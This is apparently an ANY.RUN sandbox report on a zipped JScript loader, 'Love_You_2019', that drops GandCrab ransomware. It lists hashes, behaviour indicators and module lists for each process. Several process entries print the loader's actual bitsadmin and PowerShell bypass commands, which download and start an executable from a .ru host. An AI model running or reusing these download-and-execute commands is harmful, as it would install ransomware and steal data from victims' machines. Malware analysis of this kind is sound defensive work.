General Info Watch the FULL Interactive Analysis at ANY.RUN!

File name

Love_You_2019_33235120-txt.zip

Verdict
Malicious activity
Analysis date
1/10/2019, 17:48:03
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
ransomware
gandcrab
Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v1.0 to extract
MD5

4ba6f3bb179c007d8235821b4dfb3b2e

SHA1

2372175819b3fc2ee9e828b2f54749a0abaa224c

SHA256

b25d091456ac14f044c01f9449d4dd86687fd083d563a43d5571d485283e917a

SSDEEP

24:LraergaheN8YR9M4VDTX6FHoH+4D1mz0EtofWVWn6UtcX4oAphGpxraeLgkg:faergahi8Y9M4VDOK1mIEtO6UtMAphGY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Deletes shadow copies
  • 3468116065.exe (PID: 2180)
Application was dropped or rewritten from another process
  • 3782739527.exe (PID: 3124)
  • 3358028963.exe (PID: 3828)
  • 3088011411.exe (PID: 2124)
  • 1958842343.exe (PID: 2160)
  • winsvcs.exe (PID: 2928)
  • 3875839546.exe (PID: 3676)
  • 3468116065.exe (PID: 2180)
  • wincfg32svc.exe (PID: 3568)
  • 2746537711.exe (PID: 3736)
  • 979574639568794.exe (PID: 3844)
  • 495958594939.exe (PID: 1820)
  • winsvcs.exe (PID: 2648)
Changes settings of System certificates
  • 3468116065.exe (PID: 2180)
Dropped file may contain instructions of ransomware
  • 3468116065.exe (PID: 2180)
Renames files like Ransomware
  • 3468116065.exe (PID: 2180)
Connects to CnC server
  • 3468116065.exe (PID: 2180)
Disables Windows Defender Real-time monitoring
  • winsvcs.exe (PID: 2928)
Actions looks like stealing of personal data
  • 3468116065.exe (PID: 2180)
Writes file to Word startup folder
  • 3468116065.exe (PID: 2180)
Downloads executable files from the Internet
  • winsvcs.exe (PID: 2648)
  • powershell.exe (PID: 3784)
Disables Windows System Restore
  • winsvcs.exe (PID: 2928)
GandCrab keys found
  • 3468116065.exe (PID: 2180)
Downloads executable files from IP
  • winsvcs.exe (PID: 2648)
Changes the autorun value in the registry
  • 3875839546.exe (PID: 3676)
  • 2746537711.exe (PID: 3736)
  • 979574639568794.exe (PID: 3844)
Changes Security Center notification settings
  • winsvcs.exe (PID: 2928)
Uses BITADMIN.EXE for downloading application
  • cmd.exe (PID: 2544)
Executes PowerShell scripts
  • cmd.exe (PID: 2700)
Reads Internet Cache Settings
  • 3468116065.exe (PID: 2180)
Adds / modifies Windows certificates
  • 3468116065.exe (PID: 2180)
Starts itself from another location
  • winsvcs.exe (PID: 2928)
  • 2746537711.exe (PID: 3736)
  • 3875839546.exe (PID: 3676)
  • 979574639568794.exe (PID: 3844)
Reads the cookies of Mozilla Firefox
  • 3468116065.exe (PID: 2180)
Executable content was dropped or overwritten
  • winsvcs.exe (PID: 2928)
  • 3875839546.exe (PID: 3676)
  • 2746537711.exe (PID: 3736)
  • winsvcs.exe (PID: 2648)
  • 979574639568794.exe (PID: 3844)
  • powershell.exe (PID: 3784)
Creates files like Ransomware instruction
  • 3468116065.exe (PID: 2180)
Connects to SMTP port
  • wincfg32svc.exe (PID: 3568)
Creates files in the program directory
  • 3468116065.exe (PID: 2180)
Creates files in the user directory
  • winsvcs.exe (PID: 2648)
  • powershell.exe (PID: 3784)
  • 3468116065.exe (PID: 2180)
Starts CMD.EXE for commands execution
  • WScript.exe (PID: 2884)
Dropped object may contain TOR URL's
  • 3468116065.exe (PID: 2180)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
10
ZipBitFlag:
null
ZipCompression:
None
ZipModifyDate:
2004:01:10 15:25:17
ZipCRC:
0x96a24e80
ZipCompressedSize:
1155
ZipUncompressedSize:
1155
ZipFileName:
Love_You_2019_33235120-txt.js

Screenshots

Processes

Total processes
53
Monitored processes
19
Malicious processes
9
Suspicious processes
1

Behavior graph

+
start download and start drop and start download and start download and start download and start download and start download and start drop and start drop and start drop and start drop and start winrar.exe no specs wscript.exe no specs cmd.exe no specs cmd.exe no specs bitsadmin.exe no specs powershell.exe 979574639568794.exe winsvcs.exe 495958594939.exe no specs 2746537711.exe 3875839546.exe winsvcs.exe wincfg32svc.exe #GANDCRAB 3468116065.exe 1958842343.exe no specs 3088011411.exe no specs wmic.exe no specs 3358028963.exe no specs 3782739527.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2820
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wscript.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
2884
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll

PID
2544
CMD
"C:\Windows\System32\cmd.exe" /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe&start C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bitsadmin.exe
c:\users\admin\appdata\local\temp\495958594939.exe

PID
2700
CMD
"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3664
CMD
bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\system32\bitsadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3784
CMD
PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\windows\system32\netutils.dll

PID
3844
CMD
"C:\Users\admin\AppData\Local\Temp\979574639568794.exe"
Path
C:\Users\admin\AppData\Local\Temp\979574639568794.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll
c:\users\admin\495030305060\winsvcs.exe

PID
2648
CMD
C:\Users\admin\495030305060\winsvcs.exe
Path
C:\Users\admin\495030305060\winsvcs.exe
Indicators
Parent process
979574639568794.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\495030305060\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\2746537711.exe
c:\users\admin\appdata\local\temp\3875839546.exe
c:\users\admin\appdata\local\temp\3468116065.exe
c:\users\admin\appdata\local\temp\3358028963.exe
c:\users\admin\appdata\local\temp\3782739527.exe

PID
1820
CMD
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\495958594939.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll

PID
3736
CMD
C:\Users\admin\AppData\Local\Temp\2746537711.exe
Path
C:\Users\admin\AppData\Local\Temp\2746537711.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\2746537711.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\657607470096780\winsvcs.exe

PID
3676
CMD
C:\Users\admin\AppData\Local\Temp\3875839546.exe
Path
C:\Users\admin\AppData\Local\Temp\3875839546.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3875839546.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
